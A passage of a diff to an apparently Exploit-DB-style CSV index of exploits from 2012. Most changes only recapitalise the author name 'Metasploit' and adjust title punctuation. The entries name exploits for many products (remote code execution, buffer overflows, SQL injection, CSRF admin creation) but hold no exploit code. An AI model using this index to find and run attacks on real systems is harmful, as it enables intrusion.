+18714,platforms/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console Remote Command Execution",2012-04-08,Metasploit,windows,remote,0 18715,platforms/multiple/webapps/18715.rb,"Liferay XSL - Command Execution",2012-04-08,"Spencer McIntyre",multiple,webapps,0 18718,platforms/windows/remote/18718.txt,"distinct tftp server <= 3.01 - Directory Traversal",2012-04-08,modpr0be,windows,remote,0 18719,platforms/windows/dos/18719.pl,"Play [EX] 2.1 - Playlist File (M3U/PLS/LST) DoS Exploit",2012-04-08,Death-Shadow-Dark,windows,dos,0 18720,platforms/php/webapps/18720.txt,"Utopia News Pro <= 1.4.0 - CSRF Add Admin",2012-04-08,Dr.NaNo,php,webapps,0 18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - (.chm) & (.mobi) Memory Corruption",2012-04-23,shinnai,windows,dos,0 18722,platforms/cgi/webapps/18722.txt,"ZTE Change admin password",2012-04-08,"Nuevo Asesino",cgi,webapps,0 -18723,platforms/multiple/remote/18723.rb,"Snort 2 DCE/RPC preprocessor Buffer Overflow",2012-04-09,metasploit,multiple,remote,0 -18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 Post-Auth OS Command Injection",2012-04-09,metasploit,php,webapps,0 +18723,platforms/multiple/remote/18723.rb,"Snort 2 DCE/RPC preprocessor Buffer Overflow",2012-04-09,Metasploit,multiple,remote,0 +18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 Post-Auth OS Command Injection",2012-04-09,Metasploit,php,webapps,0 18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0 -18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow",2012-04-10,metasploit,windows,remote,0 +18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow",2012-04-10,Metasploit,windows,remote,0 18728,platforms/php/webapps/18728.txt,"joomla component The Estate Agent (com_estateagent) SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0 18729,platforms/php/webapps/18729.txt,"joomla component (com_bearleague) SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0 -18730,platforms/multiple/remote/18730.rb,"Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution",2012-04-11,metasploit,multiple,remote,0 +18730,platforms/multiple/remote/18730.rb,"Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution",2012-04-11,Metasploit,multiple,remote,0 18732,platforms/php/webapps/18732.txt,"Software DEP Classified Script 2.5 - SQL Injection",2012-04-12,"hordcode security",php,webapps,0 18733,platforms/linux/local/18733.py,"WICD - Local Privilege Esclation Exploit",2012-04-12,anonymous,linux,local,0 18734,platforms/hardware/dos/18734.txt,"EMC IRM License Server DoS Server 4.6.1.1995",2012-04-12,"Luigi Auriemma",hardware,dos,0 -18735,platforms/windows/remote/18735.rb,"Quest InTrust Annotation Objects Uninitialized Pointer",2012-04-13,metasploit,windows,remote,0 +18735,platforms/windows/remote/18735.rb,"Quest InTrust Annotation Objects Uninitialized Pointer",2012-04-13,Metasploit,windows,remote,0 18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilites",2012-04-13,shpendk,php,webapps,0 -18738,platforms/php/remote/18738.rb,"V-CMS PHP File Upload and Execute",2012-04-14,metasploit,php,remote,0 +18738,platforms/php/remote/18738.rb,"V-CMS PHP File Upload and Execute",2012-04-14,Metasploit,php,remote,0 18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0 18749,platforms/osx/local/18749.py,"Office 2008 sp0 RTF Pfragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0 18741,platforms/php/webapps/18741.txt,"joomla component (com_ponygallery) SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0 18742,platforms/php/webapps/18742.php,"NetworX CMS - CSRF Add Admin",2012-04-15,N3t.Crack3r,php,webapps,0 18743,platforms/php/webapps/18743.txt,"MediaXxx Adult Video / Media Script SQL Injection",2012-04-15,"Daniel Godoy",php,webapps,0 18745,platforms/multiple/webapps/18745.txt,"ManageEngine Support Center Plus <= 7903 - Multiple Vulnerabilities",2012-04-15,xistence,multiple,webapps,0 -18747,platforms/windows/local/18747.rb,"CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit",2012-04-18,metasploit,windows,local,0 -18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow",2012-04-18,metasploit,windows,local,0 +18747,platforms/windows/local/18747.rb,"CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit",2012-04-18,Metasploit,windows,local,0 +18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow",2012-04-18,Metasploit,windows,local,0 18750,platforms/multiple/webapps/18750.txt,"Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities",2012-04-19,"Trustwave's SpiderLabs",multiple,webapps,0 18751,platforms/hardware/dos/18751.txt,"Samsung D6000 TV - Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",hardware,dos,0 18752,platforms/php/webapps/18752.txt,"newscoop 3.5.3 - Multiple Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 @@ -16238,37 +16238,37 @@ id,file,description,date,author,platform,type,port 18756,platforms/multiple/dos/18756.txt,"OpenSSL ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",multiple,dos,0 18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 - (.mp4) Crash PoC",2012-04-19,"Senator of Pirates",windows,dos,0 18758,platforms/multiple/dos/18758.txt,"Wireshark 'call_dissector()' NULL Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0 -18759,platforms/windows/remote/18759.rb,"TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow",2012-04-20,metasploit,windows,remote,0 -18760,platforms/windows/local/18760.rb,"xRadio 0.95b Buffer Overflow",2012-04-20,metasploit,windows,local,0 -18761,platforms/linux/remote/18761.rb,"Adobe Flash Player ActionScript Launch Command Execution",2012-04-20,metasploit,linux,remote,0 +18759,platforms/windows/remote/18759.rb,"TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow",2012-04-20,Metasploit,windows,remote,0 +18760,platforms/windows/local/18760.rb,"xRadio 0.95b Buffer Overflow",2012-04-20,Metasploit,windows,local,0 +18761,platforms/linux/remote/18761.rb,"Adobe Flash Player ActionScript Launch Command Execution",2012-04-20,Metasploit,linux,remote,0 18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0 18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x WebDAV - File Reading",2012-04-22,"Jelmer Kuperus",multiple,remote,0 -18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) Multiple XSS",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 +18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 - (build 12) Multiple XSS",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18765,platforms/windows/dos/18765.txt,"samsung net-i ware <= 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0 18766,platforms/windows/webapps/18766.txt,"Oracle GlassFish Server - REST CSRF",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18768,platforms/php/webapps/18768.txt,"Mega File Manager - File Download",2012-04-22,"i2sec-Min Gi Jo",php,webapps,0 -18780,platforms/windows/remote/18780.rb,"WIndows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)",2012-04-25,metasploit,windows,remote,0 +18780,platforms/windows/remote/18780.rb,"WIndows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)",2012-04-25,Metasploit,windows,remote,0 18770,platforms/php/webapps/18770.txt,"vtiger CRM 5.1.0 - Local File Inclusion",2012-04-22,Pi3rrot,php,webapps,0 18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Yılmaz",php,webapps,0 18774,platforms/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 - Buffer Overflow",2012-04-23,shinnai,windows,dos,0 18775,platforms/php/webapps/18775.php,"WebCalendar <= 1.2.4 - (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0 18776,platforms/windows/dos/18776.txt,"BeyondCHM 1.1 - Buffer Overflow",2012-04-24,shinnai,windows,dos,0 18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter - Integer Overflow",2012-04-24,"Akita Software Security",windows,dos,0 -18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 (index.php p parameter) SQL Injection",2012-04-24,G13,php,webapps,0 +18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - (index.php p parameter) SQL Injection",2012-04-24,G13,php,webapps,0 18779,platforms/hardware/remote/18779.txt,"RuggedCom Devices Backdoor Access",2012-04-24,jc,hardware,remote,0 -18781,platforms/windows/local/18781.rb,"Shadow Stream Recorder 3.0.1.7 - Buffer Overflow",2012-04-25,metasploit,windows,local,0 +18781,platforms/windows/local/18781.rb,"Shadow Stream Recorder 3.0.1.7 - Buffer Overflow",2012-04-25,Metasploit,windows,local,0 18782,platforms/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0 18783,platforms/linux/local/18783.txt,"mount.cifs chdir() Arbitrary Root File Identification",2012-04-25,Sha0,linux,local,0 18788,platforms/php/webapps/18788.txt,"php volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0 18787,platforms/php/webapps/18787.txt,"WordPress Zingiri Web Shop Plugin <= 2.4.0 - Multiple XSS Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 -18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Pre-Auth Remote Code Injection",2012-04-29,metasploit,linux,webapps,0 +18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Pre-Auth Remote Code Injection",2012-04-29,Metasploit,linux,webapps,0 18798,platforms/php/webapps/18798.txt,"Soco CMS Local File Include",2012-04-29,"BHG Security Center",php,webapps,0 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0 18791,platforms/php/webapps/18791.txt,"WordPress 3.3.1 - Multiple CSRF Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0 18792,platforms/windows/local/18792.rb,"CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit",2012-04-27,"Xenithz xpt",windows,local,0 18793,platforms/php/webapps/18793.txt,"Axous 1.1.0 - SQL Injection Vulnerabilitiy",2012-04-27,"H4ckCity Secuirty TeaM",php,webapps,0 -18833,platforms/windows/remote/18833.rb,"Solarwinds Storage Manager 5.1.0 - SQL Injection",2012-05-04,metasploit,windows,remote,0 +18833,platforms/windows/remote/18833.rb,"Solarwinds Storage Manager 5.1.0 - SQL Injection",2012-05-04,Metasploit,windows,remote,0 18795,platforms/windows/dos/18795.py,"Nokia PC Suite Video Manager 7.1.180.64 - (.mp4) Denial of Service",2012-04-27,"Senator of Pirates",windows,dos,0 18800,platforms/php/webapps/18800.txt,"Alienvault OSSIM Open Source SIEM 3.1 - Multiple Security Vulnerabilities",2012-04-29,"Stefan Schurtz",php,webapps,0 18801,platforms/php/webapps/18801.txt,"Car Portal CMS 3.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 @@ -16280,23 +16280,23 @@ id,file,description,date,author,platform,type,port 18814,platforms/php/webapps/18814.txt,"MyClientBase 0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 SEH Overwrite",2012-05-01,blake,windows,local,0 18809,platforms/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injection Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 -18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject",2012-05-01,metasploit,windows,remote,0 +18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject",2012-05-01,Metasploit,windows,remote,0 18813,platforms/php/webapps/18813.txt,"opencart 1.5.2.1 - Multiple Vulnerabilities",2012-05-01,waraxe,php,webapps,0 18815,platforms/php/webapps/18815.txt,"STRATO Newsletter Manager Directory Traversal",2012-05-01,"Zero X",php,webapps,0 18816,platforms/windows/dos/18816.py,"LAN Messenger <= 1.2.28 - Denial of Service",2012-05-01,"Julien Ahrens",windows,dos,0 18817,platforms/hardware/dos/18817.py,"Mikrotik Router Denial of Service",2012-05-01,PoURaN,hardware,dos,0 18818,platforms/windows/remote/18818.py,"Solarwinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection Exploit",2012-05-01,muts,windows,remote,0 18819,platforms/windows/dos/18819.cpp,"Microsoft Windows XP - Win32k.sys Local Kernel DoS",2012-05-02,"Lufeng Li",windows,dos,0 -18820,platforms/php/webapps/18820.php,"OpenConf <= 4.11 (author/edit.php) Remote Blind SQL Injection Exploit",2012-05-02,EgiX,php,webapps,0 +18820,platforms/php/webapps/18820.php,"OpenConf <= 4.11 - (author/edit.php) Remote Blind SQL Injection Exploit",2012-05-02,EgiX,php,webapps,0 18823,platforms/windows/local/18823.txt,"Symantec pcAnywhere - Insecure File Permissions Local Privilege Escalation",2012-05-02,"Edward Torkington",windows,local,0 18824,platforms/cgi/webapps/18824.txt,"Websense Triton - Multiple Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps,0 18822,platforms/php/webapps/18822.txt,"php-decoda - Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0 -18825,platforms/windows/remote/18825.rb,"VLC Mms Stream Handling Buffer Overflow",2012-05-03,metasploit,windows,remote,0 +18825,platforms/windows/remote/18825.rb,"VLC Mms Stream Handling Buffer Overflow",2012-05-03,Metasploit,windows,remote,0 18826,platforms/windows/local/18826.py,"AnvSoft Any Video Converter 4.3.6 - Stack Overflow Exploit",2012-05-03,cikumel,windows,local,0 18827,platforms/php/webapps/18827.txt,"Baby Gekko CMS 1.1.5c - Multiple Stored XSS Vulnerabilities",2012-05-03,LiquidWorm,php,webapps,0 18828,platforms/php/webapps/18828.txt,"PluXml 5.1.5 - Local File Inclusion",2012-05-03,"High-Tech Bridge SA",php,webapps,0 18832,platforms/php/webapps/18832.txt,"Symantec Web Gateway Cross-Site Scripting",2012-05-04,B00y@,php,webapps,0 -18834,platforms/php/remote/18834.rb,"PHP CGI Argument Injection",2012-05-04,metasploit,php,remote,0 +18834,platforms/php/remote/18834.rb,"PHP CGI Argument Injection",2012-05-04,Metasploit,php,remote,0 18871,platforms/php/webapps/18871.txt,"Travelon Express CMS 6.2.2 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18861,platforms/windows/local/18861.php,"PHP 5.4.3 - Code Execution (Win32)",2012-05-11,0in,windows,local,0 18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0 @@ -16310,25 +16310,25 @@ id,file,description,date,author,platform,type,port 18843,platforms/php/webapps/18843.txt,"myre real estate mobile 2012/2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 18844,platforms/php/webapps/18844.txt,"myCare2x CMS - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 18845,platforms/php/webapps/18845.txt,"PHP Agenda 2.2.8 - SQL Injection",2012-05-07,loneferret,php,webapps,0 -18847,platforms/windows/remote/18847.rb,"Firefox 7 / 8<= 8.0.1 - nsSVGValue Out-of-Bounds Access",2012-05-09,metasploit,windows,remote,0 +18847,platforms/windows/remote/18847.rb,"Firefox 7 / 8<= 8.0.1 - nsSVGValue Out-of-Bounds Access",2012-05-09,Metasploit,windows,remote,0 18850,platforms/php/webapps/18850.txt,"X7 Chat 2.0.5.1 - CSRF Add Admin Exploit",2012-05-09,DennSpec,php,webapps,0 18851,platforms/windows/dos/18851.py,"Guitar Pro 6.1.1 r10791 - (.gpx) Crash PoC",2012-05-09,condis,windows,dos,0 18852,platforms/windows/dos/18852.txt,"DecisionTools SharpGrid ActiveX Control RCE",2012-05-09,"Francis Provencher",windows,dos,0 18853,platforms/windows/dos/18853.txt,"SAP Netweaver Dispatcher - Multiple Vulnerabilities",2012-05-09,"Core Security",windows,dos,0 -18865,platforms/php/webapps/18865.rb,"WikkaWiki 1.3.2 - Spam Logging PHP Injection",2012-05-12,metasploit,php,webapps,0 +18865,platforms/php/webapps/18865.rb,"WikkaWiki 1.3.2 - Spam Logging PHP Injection",2012-05-12,Metasploit,php,webapps,0 18855,platforms/linux/dos/18855.txt,"Asterisk 'ast_parse_digest()' Stack Buffer Overflow",2012-03-15,"Russell Bryant",linux,dos,0 18857,platforms/php/webapps/18857.txt,"Kerio WinRoute Firewall Web Server < 6 Source Code Disclosure",2012-05-10,"Andrey Komarov",php,webapps,0 18858,platforms/php/webapps/18858.txt,"elearning server 4g - Multiple Vulnerabilities",2012-05-10,"Andrey Komarov",php,webapps,0 -18866,platforms/windows/remote/18866.rb,"Distinct TFTP 3.01 - Writable Directory Traversal Execution",2012-05-12,metasploit,windows,remote,0 +18866,platforms/windows/remote/18866.rb,"Distinct TFTP 3.01 - Writable Directory Traversal Execution",2012-05-12,Metasploit,windows,remote,0 18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0 18868,platforms/php/webapps/18868.txt,"Sockso <= 1.51 - Persistent XSS",2012-05-12,"Ciaran McNally",php,webapps,0 -18870,platforms/windows/remote/18870.rb,"Firefox 8/9 AttributeChildRemoved() Use-After-Free",2012-05-13,metasploit,windows,remote,0 +18870,platforms/windows/remote/18870.rb,"Firefox 8/9 AttributeChildRemoved() Use-After-Free",2012-05-13,Metasploit,windows,remote,0 18872,platforms/php/webapps/18872.txt,"Proman Xpress 5.0.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18873,platforms/php/webapps/18873.txt,"Viscacha Forum CMS 0.8.1.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18874,platforms/php/webapps/18874.txt,"Free Realty 3.1-0.6 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18875,platforms/php/webapps/18875.txt,"Galette (picture.php) SQL Injection",2012-05-13,sbz,php,webapps,0 18879,platforms/windows/dos/18879.rb,"Multimedia Builder 4.9.8 - (.mef) DoS",2012-05-15,"Ahmed Elhady Mohamed",windows,dos,0 -18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 SVG Browser Java Code Execution",2012-05-19,metasploit,multiple,remote,0 +18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 SVG Browser Java Code Execution",2012-05-19,Metasploit,multiple,remote,0 18877,platforms/multiple/dos/18877.txt,"FlexNet License Server Manager Stack Overflow In lmgrd",2012-05-14,"Luigi Auriemma",multiple,dos,0 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.1 - 6.0.x Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0 @@ -16342,38 +16342,38 @@ id,file,description,date,author,platform,type,port 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0 18893,platforms/hardware/remote/18893.py,"HP VSA Remote Command Execution Exploit",2012-02-17,"Nicolas Gregoire",hardware,remote,0 18894,platforms/windows/dos/18894.txt,"Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034) (0Day)",2012-05-18,Cr4sh,windows,dos,0 -18898,platforms/php/remote/18898.rb,"Active Collab 'chat module' <= 2.3.8 - Remote PHP Code Injection Exploit",2012-05-19,metasploit,php,remote,0 -18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector POST Request Buffer Overflow",2012-05-19,metasploit,windows,remote,0 +18898,platforms/php/remote/18898.rb,"Active Collab 'chat module' <= 2.3.8 - Remote PHP Code Injection Exploit",2012-05-19,Metasploit,php,remote,0 +18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector POST Request Buffer Overflow",2012-05-19,Metasploit,windows,remote,0 18899,platforms/php/webapps/18899.txt,"PHP Address Book 7.0.0 - Multiple Vulnerabilities",2012-05-19,"Stefan Schurtz",php,webapps,0 18900,platforms/php/webapps/18900.txt,"FreeNAC 3.02 - SQL Injection and XSS Vulnerabilties",2012-05-19,blake,php,webapps,0 -18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 Virtual SAN Appliance Command Execution",2012-05-21,metasploit,hardware,remote,0 +18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 Virtual SAN Appliance Command Execution",2012-05-21,Metasploit,hardware,remote,0 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 DAL File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 -18910,platforms/php/dos/18910.php,"PHP <= 5.4.3 (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 +18910,platforms/php/dos/18910.php,"PHP <= 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 18911,platforms/php/webapps/18911.txt,"Vanilla Forums About Me Plugin Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 18912,platforms/php/webapps/18912.txt,"Vanilla FirstLastNames 1.3.2 Plugin - Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 18913,platforms/php/webapps/18913.php,"Supernews <= 2.6.1 - SQL Injection Exploit",2012-05-21,WhiteCollarGroup,php,webapps,0 -18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow",2012-05-21,metasploit,windows,local,0 +18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow",2012-05-21,Metasploit,windows,local,0 18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation Exploit",2012-05-22,sickness,windows,local,0 18908,platforms/php/webapps/18908.txt,"Vanilla Forums LatestComment 1.1 Plugin - Persistent XSS",2012-05-18,"Henry Hoggard",php,webapps,0 -18915,platforms/windows/remote/18915.rb,"FlexNet License Server Manager lmgrd Buffer Overflow",2012-05-23,metasploit,windows,remote,0 -18922,platforms/php/webapps/18922.rb,"appRain CMF - Arbitrary PHP File Upload",2012-05-25,metasploit,php,webapps,0 +18915,platforms/windows/remote/18915.rb,"FlexNet License Server Manager lmgrd Buffer Overflow",2012-05-23,Metasploit,windows,remote,0 +18922,platforms/php/webapps/18922.rb,"appRain CMF - Arbitrary PHP File Upload",2012-05-25,Metasploit,php,webapps,0 18916,platforms/windows/dos/18916.txt,"Symantec End Point Protection 11.x & Symantec Network Access Control 11.x LCE PoC",2012-05-23,41.w4r10r,windows,dos,0 18917,platforms/linux/local/18917.txt,"Mod_Auth_OpenID Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0 18918,platforms/multiple/dos/18918.txt,"Wireshark DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,multiple,dos,0 18919,platforms/multiple/dos/18919.txt,"Wireshark Multiple Dissector Denial of Service Vulnerabilities",2012-05-24,"Laurent Butti",multiple,dos,0 18920,platforms/multiple/dos/18920.txt,"Wireshark Misaligned Memory Denial of Service",2012-05-24,"Klaus Heckelmann",multiple,dos,0 18921,platforms/php/webapps/18921.txt,"Jaow <= 2.4.5 - Blind SQL Injection",2012-05-24,kallimero,php,webapps,0 -18923,platforms/windows/local/18923.rb,"OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow",2012-05-25,metasploit,windows,local,0 +18923,platforms/windows/local/18923.rb,"OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow",2012-05-25,Metasploit,windows,local,0 18926,platforms/windows/dos/18926.php,"bsnes 0.87 - Local Denial of Service",2012-05-25,"Yakir Wizman",windows,dos,0 18927,platforms/php/webapps/18927.txt,"socialengine 4.2.2 - Multiple Vulnerabilities",2012-05-25,i4k,php,webapps,0 -18929,platforms/windows/remote/18929.rb,"RabidHamster R4 Log Entry sprintf() Buffer Overflow",2012-05-25,metasploit,windows,remote,0 +18929,platforms/windows/remote/18929.rb,"RabidHamster R4 Log Entry sprintf() Buffer Overflow",2012-05-25,Metasploit,windows,remote,0 18950,platforms/php/webapps/18950.txt,"NewsAdd <= 1.0 - Multiple SQL Injection Vulnerabilities",2012-05-30,WhiteCollarGroup,php,webapps,0 18931,platforms/ios/dos/18931.rb,"iOS <= 5.1.1 - Safari Browser - JS match() & search() Crash PoC",2012-05-25,"Alberto Ortega",ios,dos,0 -18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal (2)",2012-05-27,metasploit,windows,remote,0 -18934,platforms/php/webapps/18934.rb,"WeBid converter.php Remote PHP Code Injection",2012-05-27,metasploit,php,webapps,0 +18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal (2)",2012-05-27,Metasploit,windows,remote,0 +18934,platforms/php/webapps/18934.rb,"WeBid converter.php Remote PHP Code Injection",2012-05-27,Metasploit,php,webapps,0 18935,platforms/php/webapps/18935.txt,"b2ePms 1.0 - Multiple SQLi Vulnerabilities",2012-05-27,loneferret,php,webapps,0 -18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 Command Execution",2012-05-28,metasploit,linux,remote,0 +18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 Command Execution",2012-05-28,Metasploit,linux,remote,0 18937,platforms/php/webapps/18937.txt,"PBBoard 2.1.4 - Local File Inclusion",2012-05-28,n4ss1m,php,webapps,0 18981,platforms/windows/local/18981.txt,"Sysax <= 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0 18944,platforms/php/webapps/18944.txt,"PHP Volunteer Management System 1.0.2 - Multiple SQL Injection Vulnerabilities",2012-05-28,loneferret,php,webapps,0 @@ -16381,28 +16381,28 @@ id,file,description,date,author,platform,type,port 18946,platforms/windows/dos/18946.txt,"Tftpd32 DNS Server 4.00 - Denial of Service",2012-05-29,demonalex,windows,dos,0 18940,platforms/windows/dos/18940.php,"LibreOffice 3.5.3 - (.rtf) FileOpen Crash",2012-05-28,shinnai,windows,dos,0 18941,platforms/php/webapps/18941.txt,"PHP Volunteer Management System 1.0.2 - Multiple Vulnerabilities",2012-05-28,Ashoo,php,webapps,0 -18947,platforms/windows/local/18947.rb,"ispVM System XCF File Handling Overflow",2012-05-29,metasploit,windows,local,0 +18947,platforms/windows/local/18947.rb,"ispVM System XCF File Handling Overflow",2012-05-29,Metasploit,windows,local,0 18948,platforms/php/webapps/18948.txt,"PBBoard 2.1.4 - Multiple SQL Injection Vulnerabilities",2012-05-29,loneferret,php,webapps,0 -19025,platforms/windows/remote/19025.rb,"Sielco Sistemi Winlog 2.07.14 - Buffer Overflow",2012-06-08,metasploit,windows,remote,0 +19025,platforms/windows/remote/19025.rb,"Sielco Sistemi Winlog 2.07.14 - Buffer Overflow",2012-06-08,Metasploit,windows,remote,0 18952,platforms/windows/dos/18952.txt,"Microsoft Wordpad 5.1 - (.doc) Null Pointer Dereference",2012-05-30,condis,windows,dos,0 18953,platforms/php/webapps/18953.txt,"Ganesha Digital Library 4.0 - Multiple Vulnerabilities",2012-05-30,X-Cisadane,php,webapps,0 -18954,platforms/windows/local/18954.rb,"MPlayer SAMI Subtitle File Buffer Overflow",2012-05-30,metasploit,windows,local,0 +18954,platforms/windows/local/18954.rb,"MPlayer SAMI Subtitle File Buffer Overflow",2012-05-30,Metasploit,windows,local,0 18955,platforms/php/webapps/18955.txt,"Simple Web Content Management System 1.1-1.3 - Multiple SQL Injection",2012-05-30,loneferret,php,webapps,0 18956,platforms/windows/dos/18956.c,"GIMP 2.6 script-fu < 2.8.0 - Buffer Overflow",2012-05-31,"Joseph Sheridan",windows,dos,0 -18957,platforms/php/webapps/18957.rb,"PHP Volunteer Management System 1.0.2 - Arbitrary File Upload",2012-05-31,metasploit,php,webapps,0 +18957,platforms/php/webapps/18957.rb,"PHP Volunteer Management System 1.0.2 - Arbitrary File Upload",2012-05-31,Metasploit,php,webapps,0 18958,platforms/windows/dos/18958.html,"Sony VAIO Wireless Manager 4.0.0.0 - Buffer Overflows",2012-05-31,"High-Tech Bridge SA",windows,dos,0 18959,platforms/multiple/local/18959.txt,"Browser Navigation 